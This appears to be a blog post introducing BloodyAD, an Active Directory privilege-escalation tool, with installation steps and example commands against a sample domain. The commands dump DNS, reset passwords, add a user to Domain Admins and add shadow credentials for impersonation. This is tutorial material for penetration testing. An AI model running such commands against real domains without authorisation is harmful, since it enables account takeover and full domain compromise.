BloodyAD - Active Directory Privilege Escalation Tool

BloodyAD - Active Directory Privilege Escalation Tool

BloodyAD is an open-source Active Directory (AD) privilege escalation tool designed to perform specific LDAP and SAMR calls to a domain controller.

It is a versatile "Swiss Army knife" for AD privilege escalation (privesc), offering a wide range of functionalities for security professionals and penetration testers

Key Features of BloodyAD

  • Authentication Options: Supports multiple authentication methods, including cleartext passwords, pass-the-hash, pass-the-ticket, and certificate-based authentication.

  • Protocol Support: Communicates with LDAP/LDAPS/SAMR services on domain controllers.

  • Proxy Compatibility: Can be used transparently with a SOCKS proxy for operational stealth.

  • Sensitive Data Handling: Allows the exchange of sensitive information even without LDAPS encryption.

  • Cross-Platform: Works on Linux, macOS, and Windows.

  • Verbose Output: Provides detailed feedback to help users troubleshoot issues during operations.

  • Multi-Domain Support: Includes features for multi-domain environments, such as displaying domain trusts and DNS records.

Installation Requirements

To use BloodyAD, you need:

  • Python 3

  • Dependencies like MSLDAP, dnspython, Impacket, and DSinternals. These can be installed using the requirements.txt file:

pip3 install -r requirements.txt

For Kali Linux users, BloodyAD can be installed directly:

sudo apt install bloodyad

Usage Overview

Authentication and Connection

BloodyAD connects to a domain controller using various authentication methods. A typical command includes parameters for the domain (-d), username (-u), password or hash (-p), and the target host (--host).

Example:

bloodyAD --host 192.168.10.2 -d bloody.local -u john.doe -p Password123!

Common Commands

Get Commands

Retrieve information from Active Directory:

1.Children Objects:

bloodyAD --host 192.168.10.2 -d bloody.local -u john.doe -p Password123! get children --target "Domain Admins"

2.DNS Records:

bloodyAD --host 192.168.10.2 -d bloody.local -u john.doe -p Password123! get dnsDump

3.Group Memberships:

bloodyAD --host 192.168.10.2 -d bloody.local -u john.doe -p Password123! get membership john.doe

Set Commands

Modify AD objects:

1.Change Passwords:

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! set password john.doe 'NewPassword!'

2.Modify Attributes:

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! set object john.doe description "New Description"

Add Commands

Add new objects or permissions in AD:

1.Add User to Group:

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! add groupMember "Domain Admins" john.doe

2.Add Shadow Credentials (for impersonation):

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! add shadowCredentials john.doe

Advanced Functionalities

1.Security Descriptor Resolving:

Use --resolve-sd to translate raw security descriptors into readable permissions.

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! get search --resolve-sd

2.Multi-Domain Operations:

Display trusts between domains or enumerate DNS records across domains.

bloodyAD --host 192.168.10.2 -d bloody.local -u admin -p AdminPass123! get trusts

3.Automated Privilege Escalation:

Combine BloodyAD with tools like BloodHound and Neo4j for automated attack path generation (pathgen.py) and execution (autobloody.py).

Practical Applications

BloodyAD is particularly useful for:

  • Enumerating AD objects, permissions, and relationships.

  • Exploiting weak permissions like GenericAll or WriteOwner to escalate privileges.

  • Automating complex privilege escalation paths in multi-domain environments.

  • Testing the security of AD configurations during penetration tests or red team exercises.

Acknowledgements

The development of BloodyAD is inspired by several tools and libraries in the cybersecurity community:

  • MSLDAP library by @skelsec (core engine).

  • Impacket contributors (LDAP attack structures).

  • PowerView.ps1 by @PowerShellMafia (inspiration for AD enumeration).

  • adidnsdump.py by @dirkjanm and Invoke-DNSUpdate.ps1 by @Kevin-Robertson (DNS functionalities).

  • pydsinternals module by @p0dalirius (shadow credential attacks).

Conclusion

BloodyAD is a powerful framework for Active Directory privilege escalation, offering extensive features for reconnaissance, exploitation, and automation in AD environments.

 Its flexibility and cross-platform support make it an essential tool for cybersecurity professionals seeking to understand and test AD security configurations effectively. You can learn more and Download BloodyAD in GitHub.

Upgrade Your Cybersecurity Skills EHA: Learn 150+ Practical Cyber Security Courses Online With Life Time Access - Enroll Here

 

Back to blog